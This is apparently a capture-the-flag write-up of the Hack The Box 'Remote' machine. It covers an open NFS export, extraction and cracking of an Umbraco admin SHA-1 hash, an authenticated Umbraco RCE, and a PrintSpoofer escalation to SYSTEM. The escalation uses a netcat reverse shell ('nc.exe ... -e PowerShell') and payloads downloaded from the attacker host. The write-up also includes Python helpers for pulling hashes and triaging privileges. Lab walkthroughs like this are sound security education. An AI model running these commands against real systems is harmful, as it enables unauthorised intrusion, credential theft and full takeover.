# HTB - Remote

**Scope**

{% hint style="success" %}
IP Address 10.10.10.180
{% endhint %}

## **Enumeration**

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
5985/tcp open  wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -p21,80,111,139,445,2049,5985 $ip -sCV -oA Nmap/script-scan 

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-time: 
|   date: 2024-07-06T02:24:29
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
```

* Open ports (TCP): 21, 80, 111, 135, 139, 445, 2049, 5985
* Open ports (UDP): 111, 2049
* Services: FTP - HTTP - RPC - SMB - NFS - WinRM
* Important notes: FTP anonymous login allowed

### Service Enumeration

#### **FTP**

Nmap showed that anonymous login is allowed, but it didn't lead anywhere: a recursive anonymous fetch only retrieves an empty listing.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip

2024-07-05 22:42:16 (0.00 B/s) - ‘10.10.10.180/.listing’ saved [0]
```

#### **SMB**

SMB enumeration didn't lead anywhere either; null sessions are rejected.

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ smbclient -N -L //$ip                   
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                        

SMB         10.10.10.180    445    REMOTE           [-] remote\: STATUS_ACCESS_DENIED 
```

#### **RPC**

RPC behaves the same as SMB: the null session is rejected.

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip                                             
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED
```

#### **NFS**

Port `2049` is open, which is used by the Network File System (NFS), so I'll check whether any exports are accessible.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip                      
Export list for 10.10.10.180:
/site_backups (everyone)
```

I found an interesting export. `(everyone)` means any client can mount it without authentication, so I'll mount it on my host and look at its contents.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt                                                                   

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups 

┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers  App_Plugins  Global.asax  Umbraco         Views       aspnet_client  css           scripts
App_Data      Config       Media        Umbraco_Client  Web.config  bin            default.aspx
```

I tried to hunt for usernames and passwords with `grep`, but nothing turned up, so I searched online for where `Umbraco CMS` stores its credentials and found this:

<figure><img src="/files/ymSuXcfZtUzFeSmcP2yM" alt=""><figcaption></figcaption></figure>

The CMS stores its users and password hashes in `Umbraco.sdf`, a SQL Server Compact database under `App_Data`. It is a binary file, so instead of opening it in a text editor I listed its printable strings with `strings` and grepped for credential-related keywords.

```bash
┌──(kali㉿kali)-[~/…/machines/Remote/mnt/App_Data]
└─$ strings Umbraco.sdf | grep "users\|password\|hashes\|admin"

<snip>
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
<snip>
```

The record tags the hash as `SHA1`, so I confirm the hashcat mode with `hashid` and then crack it with `hashcat`.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashid -m b8be16afba8c314ad33d812f22a04991b90e2aaa

[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt 

b8be16afba8c314ad33d812f22a04991b90e2aaa:baconanxxxxxxx  

Session..........: hashcat
Status...........: Cracked
```
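The `strings | grep` pass above works but is easy to miss records with. The following Python example is mine (not part of the write-up or of Umbraco itself): it scans the raw bytes of an `Umbraco.sdf` for the same `email + 40-hex digest + {"hashAlgorithm":"..."}` layout the dump shows, emits `hashcat --username` lines with the mode the tag implies, and verifies a candidate password the way mode 100 does (unsalted SHA-1 over the raw password). The sample blob is constructed: it embeds the record from this page plus two made-up users. Tolerating a few control bytes between fields and the `HASHCAT_MODES` table are my assumptions.

```python
"""Extract Umbraco back-office users and password hashes from Umbraco.sdf.

Added example; not from the write-up or from Umbraco itself.
Matches the layout the `strings` dump shows: e-mail, 40-hex digest and the
JSON tag {"hashAlgorithm":"..."} back to back.  Tolerating a few control
bytes between the fields is an assumption about the SQL CE page layout.
"""
import hashlib
import re
import sys
from dataclasses import dataclass

# Only the tag seen on this box is mapped.  Newer Umbraco installs tag hashes
# differently (e.g. HMACSHA256); those fall through as None on purpose.
HASHCAT_MODES = {"SHA1": 100}

RECORD_RE = re.compile(
    rb"([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})"  # login e-mail
    rb"[\x00-\x1f]{0,8}"                                   # assumed: optional control bytes
    rb"([0-9a-fA-F]{40})"                                  # hex digest (SHA-1 sized)
    rb"[\x00-\x1f]{0,8}"
    rb'\{"hashAlgorithm":"([A-Za-z0-9]+)"\}'               # Umbraco's algorithm tag
)


@dataclass(frozen=True)
class UmbracoUser:
    email: str
    digest: str
    algorithm: str

    @property
    def hashcat_mode(self):
        return HASHCAT_MODES.get(self.algorithm.upper())


def extract_users(blob: bytes) -> list:
    """Every user record found in the raw file bytes, in file order."""
    return [
        UmbracoUser(email.decode(), digest.decode().lower(), algo.decode())
        for email, digest, algo in RECORD_RE.findall(blob)
    ]


def hashcat_lines(users) -> list:
    """`user:hash` lines for `hashcat --username -m <mode>`; unmapped algorithms are skipped."""
    return [f"{u.email}:{u.digest}" for u in users if u.hashcat_mode is not None]


def check_candidate(user: UmbracoUser, candidate: str) -> bool:
    """True if `candidate` is the password behind a SHA1-tagged record.

    hashcat mode 100 is unsalted SHA-1 over the raw password bytes, which is
    what cracked the hash on this box; other tags are refused rather than guessed.
    """
    if user.algorithm.upper() != "SHA1":
        raise ValueError(f"no verifier for hashAlgorithm={user.algorithm}")
    return hashlib.sha1(candidate.encode()).hexdigest() == user.digest


# Constructed sample: the record from this page plus two made-up users.
SAMPLE_PASSWORD = "Winter2024!"  # made up; not the real password on the box
SAMPLE_BLOB = b"".join([
    b"\x00\x10junk\x00",
    b'admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}',
    b"\x00\x00more junk\x00",
    b"editor@example.test\x00",                                   # control byte between fields
    hashlib.sha1(SAMPLE_PASSWORD.encode()).hexdigest().encode(),
    b'\x00{"hashAlgorithm":"SHA1"}',
    b"\x00\x00ghost@example.test",
    b"0" * 40,                                                    # unmapped algorithm tag
    b'{"hashAlgorithm":"HMACSHA256"}',
])


if __name__ == "__main__":
    # Usage: python umbraco_sdf_users.py [path/to/Umbraco.sdf]
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for user in extract_users(blob):
        mode = user.hashcat_mode if user.hashcat_mode is not None else "?"
        print(f"{user.email:<28} {user.algorithm:<10} -m {mode:<4} {user.digest}")
```

Point it at the mounted `App_Data/Umbraco.sdf` and feed the `user:hash` lines to `hashcat --username -m 100`; records whose tag is not `SHA1` are printed with `-m ?` so they are not silently cracked under the wrong mode.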

## Initial Access

***

At `http://10.10.10.180/umbraco/` there is a login form.

<figure><img src="/files/j9YOF3RVWf2BDPPtyAd9" alt=""><figcaption></figcaption></figure>

I logged in with the credentials found before, then looked for the webapp version

<figure><img src="/files/gAv4xtNasR0qMXOfbRvn" alt=""><figcaption></figcaption></figure>

I searched for public exploits with `searchsploit`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ searchsploit umbraco        
<snip>
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
<snip>
```

I then looked on GitHub for a PoC matching the web app's version and found this one:

{% embed url="https://github.com/Jonoans/Umbraco-RCE" %}

<figure><img src="/files/jcqrkWZHljbilLlKmKk8" alt=""><figcaption></figcaption></figure>

I cloned it locally and ran the exploit; `-i` is the attacker IP the reverse shell calls back to.

```bash
┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25

[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode

PS C:\windows\system32\inetsrv> 
```

```PowerShell
PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx
```

{% hint style="info" %}
User flag 442f18b8accdec694dxxxxxxxxxxx
{% endhint %}

***

## Privilege Escalation

When I ran `whoami` and saw the output, I knew it was an easy win: `iis apppool\defaultapppool` usually holds `SeImpersonatePrivilege`, which can be abused to escalate to SYSTEM with `RoguePotato` or `PrintSpoofer`.

```PowerShell
PS C:\Users\Public> whoami 
iis apppool\defaultapppool
```

Let's verify

```PowerShell
PS C:\Users\Public> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```
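As an added example (mine, not from the write-up or from PrintSpoofer/RoguePotato), this Python snippet parses the `whoami /priv` table above and applies the rule those tools rely on: the privilege has to be held by the token, and a `Disabled` state only means it is not currently switched on, which the exploit can do itself. Pairing `SeAssignPrimaryTokenPrivilege` with `SeImpersonatePrivilege` as the Potato-family set, and the second, minimal privilege table for a non-service account, are my assumptions and constructions.

```python
"""Triage `whoami /priv` output for token-impersonation privilege escalation.

Added example; not part of the write-up or of PrintSpoofer/RoguePotato.
It parses the privilege table and applies the rule those tools rely on: the
privilege must be *held* by the token.  A "Disabled" state only means it is
not switched on right now; a process can enable a held privilege itself.
"""

# The two privileges PrintSpoofer and the Potato family look for (assumed pairing).
TOKEN_PRIVS = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")


def parse_whoami_priv(text: str) -> dict:
    """Map privilege name -> state from a `whoami /priv` dump (header lines ignored)."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows: name in the first column, state in the last; the
        # description in between contains spaces, so don't rely on its width.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def token_privileges(privs: dict) -> dict:
    """Impersonation-class privileges the token holds, with their current state."""
    return {name: privs[name] for name in TOKEN_PRIVS if name in privs}


def printspoofer_applies(privs: dict) -> bool:
    """PrintSpoofer needs SeImpersonatePrivilege held; Enabled vs Disabled does not matter."""
    return "SeImpersonatePrivilege" in privs


# Constructed sample 1: the table from this page (IIS application pool identity).
APPPOOL_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample 2: a minimal table for a non-service account with no token privileges.
STANDARD_USER_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


if __name__ == "__main__":
    for label, dump in (("apppool", APPPOOL_PRIV), ("standard user", STANDARD_USER_PRIV)):
        privs = parse_whoami_priv(dump)
        print(label, token_privileges(privs), "PrintSpoofer:", printspoofer_applies(privs))
```

Paste the dump from the target into `parse_whoami_priv`; if `token_privileges` is empty, the Potato/PrintSpoofer route is closed and a different escalation path is needed.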

I served `PrintSpoofer.exe` and `nc.exe` over HTTP from my attack host and pulled them onto the target (in Windows PowerShell, `curl` is an alias for `Invoke-WebRequest`)

```PowerShell
PS C:\Users\Public> curl 10.10.16.25/PrintSpoofer.exe -o .\PrintSpoofer.exe
PS C:\Users\Public> curl 10.10.16.25/nc.exe -o .\nc.exe
```

Easy win :)

```PowerShell
PS C:\Users\Public> .\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
.\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.180] 49719

PS C:\Windows\system32> whoami
nt authority\system
```

```PowerShell
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
60ea8c532b06a17faxxxxxxxxxxxxxxx
```

{% hint style="info" %}
Root flag 60ea8c532b06a17faxxxxxxxxxxxxxxx
{% endhint %}

